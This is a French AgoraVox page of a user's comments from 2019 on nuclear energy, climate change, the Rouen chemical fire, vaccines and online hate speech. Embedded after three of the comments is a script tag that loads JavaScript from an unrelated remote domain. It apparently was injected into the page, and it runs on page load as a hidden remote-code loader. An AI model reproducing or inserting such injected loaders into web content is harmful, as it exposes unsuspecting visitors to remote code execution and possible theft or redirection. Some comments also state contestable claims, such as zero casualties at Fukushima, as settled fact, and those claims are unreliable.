• AgoraVox sur Twitter
  • RSS
  • Agoravox TV
  • Agoravox Mobile

Les commentaires de pierrot



  • pierrot pierrot 21 novembre 2019 10:59

    @San Jose
    Je ne connaissais pas l’annonce de cette mort. Mais comme vous le présentez, il est quasi impossible, au niveau d’un seul individu, de faire une relation causale entre un cancer et une faible dose de radioactivité.
    Pour une vaste cohorte, cela aurait un sens.

    <script src="//amptylogick.com/21aca573d498d25317.js"></script>


  • pierrot pierrot 21 novembre 2019 10:55

    @JC_Lavau
    Il existe beaucoup de contributeurs aux variations climatiques.
    Les nuages et les aérosols chimiques en font partie mais ces contributeurs ont un impact faible par rapport à celui dû à l’augmentation des émissions de gaz de serre.
    Jean Marc Jancovici a bien quantifié tous ces facteurs sur son site.

    <script src="//amptylogick.com/21aca573d498d25317.js"></script>


  • pierrot pierrot 20 novembre 2019 21:56

    Il est largement démontré que la production d’énergie nucléaire est celle (avec l’hydraulique) qui émet le mins de gaz à effet de serre lorsque l’on prend en compte l’ensemble du cycle : moins que l’éolien (massif de béton...) photovoltaïque (four thermique de fabrication de silicium mono cristallin ...).

    Quand aux émissions radioactives elles ne représentent bien moins de 0,01 % des imparts (en Sievert) de la radioactivité naturelle (tellurique, cosmique ...) C’est aussi l’énergie qui a provoqué le moins de morts depuis plus de 50 ans malgré Tchernobyl et Fukushima Dai-Ichi (0 mort, 0 blessé, impact minimes inférieur à 0,020 Sv pour les populations environnantes les plus proches.

    Sans énergie nucléaire, il n’y a pas de solution pour se prémunir des impacts climatiques qui sont une grave menace à long terme. C’est pourquoi, nous observons une importance relance du nucléaire, particulièrement en Asie (Chine : 40 réacteurs, Inde, Russie, Viet Nam ...

    <script src="//amptylogick.com/21aca573d498d25317.js"></script>


  • pierrot pierrot 16 octobre 2019 22:18

    La situation en Syrie du Nord évolue très vite.

    L’intervention des Russes semble avoir mis fin à l’attaque des forces turques contre les Kurdes.

    La diplomatie brouillonne de Trump est incompréhensible et donc dangereuse.



  • pierrot pierrot 16 octobre 2019 22:14

    Bonjour,

    il est souvent souhaitable d’explorer des idées nouvelles pour combattre le cancer.

    Mais beaucoup d’idées disparaissent rapidement lorsque les résultats expérimentaux ne les confirment pas, ce qui est le cas de la bio électricité qui n’a jamais démontré des résultats positifs étayés et bien démontrés ?



  • pierrot pierrot 15 octobre 2019 19:15

    @julius 1ER
    Même avec un EPR à 12 milliards d’euros cela conduit à un cout de KWh 3 fois moins cher que le cout du KWh de éoliennes off shore qui devraient être mises en serve en 2022 au lieux, conteront (selon calcul) plus de 30 milliards d’euros pour produire peu d’électricité.



  • pierrot pierrot 15 octobre 2019 18:29

    Bonjour les analyses des divers échantillons de l’environnement proches de Rouen : air, herbes, légumes, fruits, lait, eaux etc. ne montrent pas de traces de dioxines ou de furannes au dessus du seuil habituellement rencontré dans tout environnement.

    Si les populations de Rouen n’ont pas confiance dans les résultats d’analyses fines de divers laboratoires indépendants : IRSN, INERIS CNRS, INVS, IRSN etc. ils ont la possibilités de faire appels à des laboratoires de mesures étrangers qui ne dépendent en rien des autorités françaises.

    Le critère le plus pertinent reste les analyses permanentes du sang des populations mais nous obtiendront des résultats que dans quelques années ou décennies au mieux pour mesurer les taux de dioxines et furanne en toxicité chronique.

    Sera ne conviendront pas aux populations qui souhaitent un résultat rapide incompatibles avec les contraintes d’analyses chronique à long terme.



  • pierrot pierrot 7 octobre 2019 09:32

    Bonjour,

    je n’ai aucune reproche sur la personne physique de Gréta.

    Le risque climatique est réel, bien documenté.

    Les analyses du GIEC sont pertinentes et les scientifiques ont expérimentalement bien démontré le risque climatique et les contributions (émission des gaz à effet de serre, albédo des sols...).

    Cependant les soutiens et les préconisations de Gréta doivent être soumis à l’analyse critique avec une méthode rationnelle.

    Je n’en dirai pas plus aujourd’hui.



  • pierrot pierrot 4 octobre 2019 07:40

    Bonjour,

    les populations environnantes de Rouen décrivent plutôt une odeur acre donc probablement pas de présence d’H2S (hydrogène sulfuré toxique mais dont le nez est un capteur fiable même pour des faibles concentrations.

    Les dioxines et furannes (en particulier les molécules tétra chlorées de cette famille dits congénères) sont usuellement émis pour tout incendie et même pour un barbecue. Mais il convient d’examiner les teneurs dans l’atmosphère et les comparer aux doses réglementaires qui sont très protectrices vis à vis des risques sanitaires aiguë et chroniques.Il semblerait que les résultats d’analyses fines (difficiles à réaliser) montrent des teneurs extrêmement faibles à la frontière de la limite de détection de la méthode d’analyse).

    Reste surtout à évaluer les différents hydrocarbures, en particulier les polycycliques et les organo chlorés qui sont toxiques.



  • pierrot pierrot 4 octobre 2019 07:27

    @kimonovert
    Je suis tout à fait d’accord avec vos propos.
    Le rapport d’experts indépendants (INERIS, CRNS, INVS, IRSN, INRS...) concernant les impacts sanitaires et environnementaux demandent du temps (plusieurs mois au moins) et aboutira à un rapport de quelques milliers de pages qui sera probablement contesté.
    Pour le citoyen, il sera déçu car , n’ayant pas les connaissance de chimie, d’écotoxicité et de toxicité aigu et chronique...il affirmera, je n’y comprend rien donc on me ment etc.
    Dommage et décevant.



  • pierrot pierrot 3 octobre 2019 10:39

    Bonjour, ces propos inamissibles confirment que l’on a bien fait de crucifier Jésus (s’il a existé ?) et que dieu, s’il existe, devrait paraitre pour crimes contre l’humanité au tribunal de La Haye.

    Pour être plus sérieux, cela montre que les écrits dits « saints » sont écrits par des hommes et donc le reflet de la société dans laquelle ils vivaient (l’homme a créé dieu à son image ...



  • pierrot pierrot 3 octobre 2019 10:34

    Bonjour,

    la variation climatique est un fait mesurable.

    C’est un phénomène complexe avec de nombreux contributeurs dont : pour le long terme, les paramètres de la rotation de la terre, les courants océaniques ...

    Pour le court terme (1 siècle) les émissions de gaz à effet de serre (H2O, CO2, CH4, SF6, N2O, O3, HFC, CFC ...) sont majeures en plus des autres contributions (albédo des sols, nuages, bas, nuages hauts, aérosols particulaires et aérosols chimique (NOx, SO2...),

    Mais nier l’impact de l’augmentation de la concentration du CO2 dans les basses couches atmosphériques montre une méconnaissance de la physique et de la chimie.



  • pierrot pierrot 3 octobre 2019 10:21

    La liste de la présence de molécules ne peut pas servir à une étude d’impact sanitaire et environnemental si on ne connait pas les quantités et concentrations dans les échantillons de l’environnement (air, plantes...).

    Pour cela il faudrait une étude d’experts indépendants (INERIS, INVS, CNRS, IRSN ... et étrangers) mais cela demandera plusieurs année et les populations environnantes qui ne connaissent pas ces contraintes ne seront pas satisfaites.

    C’est ainsi.



  • pierrot pierrot 3 octobre 2019 10:09

    Bonjour,

    je regrette l’arrêt du projet de réacteur à neutrons rapides Astrid. Mais , comme le CEA, je pense que cela n’est pas fondamental dans la mesure où ce type de réacteur de quatrième génération n’était pas prévu à l’industrialisation avant les années 2040 au mieux.

    Actuellement les projets concernent quasi exclusivement les réacteurs de troisième génération de type EPR entre autres, qui se développeront pendant la période de 2015 à 2050.

    Rien n’empêche la France de signer des accords de coopération sur ce type de réacteurs avec la Russie et la Chine qui poursuivent ce projet.



  • pierrot pierrot 18 août 2019 12:38

    Les chiffres de pole emploi sont biaisés car des chômeurs sont rayés des listes, mais d’autres travaillent et déclarent rechercher un emploi.

    Les bons indicateurs pertinents du niveau de chômage sont ceux de l’INSEE et le nombre de personnes ayant un emploi. Heureusement ces le chômage diminue (peu mais indubitablement) en France à environ 8,5 % de la population en age de travailler ; c’est moins bien que les pays du Nord de l’Europe mais mieux qu’en Italie Espagne, Grèce.



  • pierrot pierrot 18 août 2019 12:20

    Pauvre Cochet, la vieillesse est parfois une dérive.

    Il n’essaye m^me pas d’argumenter avec des éléments de preuves, c’est juste un vague sentiment.

    Il n’y a aucune fatalité et l’humanité a des ressources intellectuelles pour se prémunir du risque climatique : le diagnostic est connu et les remèdes connus (diminuer les émissions de gaz à effet de serre, ce n’est pas facile mais accessible par un volonté mondiale.



  • pierrot pierrot 7 août 2019 11:21

    @Yann Esteveny
    Non, le citoyen honnête et respectueux n’acceptera jamais le racisme, l’antisémitisme, la haine de l’étranger, la haine des la franc maçonnerie, la haine de l’écologie (qui est une science), la haine des la médecine et du progrès scientifique, du fascisme, du totalitarisme...
    C’est cela la dignité retrouvée et non vos propos immondes.



  • pierrot pierrot 7 août 2019 11:16

    J’ai ai marre des propos de haine diffusés sans contrôles sur des réseaux sociaux aux mains des milliardaires américains.

    Si la justice française ne réglemente pas l’alternative sera probablement la loi de la jungle de citoyens excédés des appels à la haine, aux meurtres....

    La circulation automobile est aussi régulée comme d’autres domaines d’activité et c’est heureux, sinon ce serait impossible de circuler et il serait stupide d’affirmer que les feux tricolores sont une entrave à ma liberté de circuler.

    la civilisation c’est la liberté sous réserve de ne pas entraver celle des autres (constitution).



  • pierrot pierrot 30 juillet 2019 14:11

    @Hypatie
    Comment pouvez vous imaginer une seule seconde que l’ensemble des personnels médicaux dans le monde aurait pour unique but de faire le maximum de mort, de cancers induit, de maladies du cerveau ?
    sans qu’il y soit mis fin.
    L’hypothèse d’une telle conspiration est irréaliste et pourquoi tuer les gens qui achètent les produits médicaux ? absurde !



  • pierrot pierrot 30 juillet 2019 14:07

    @pierrot
    Bonjour,
    je l’ai lu dans le journal LE MONDE lors des polémiques sur les adjuvants d’aluminium en réponse aux sites conspirationnistes affirmant à tord que le personnel médical refusait de vacciner leurs enfants.
    Mais désolé, je n’ai pas garder la trace de cet article sauf dans mon cerveau qui est sain et bien constitué.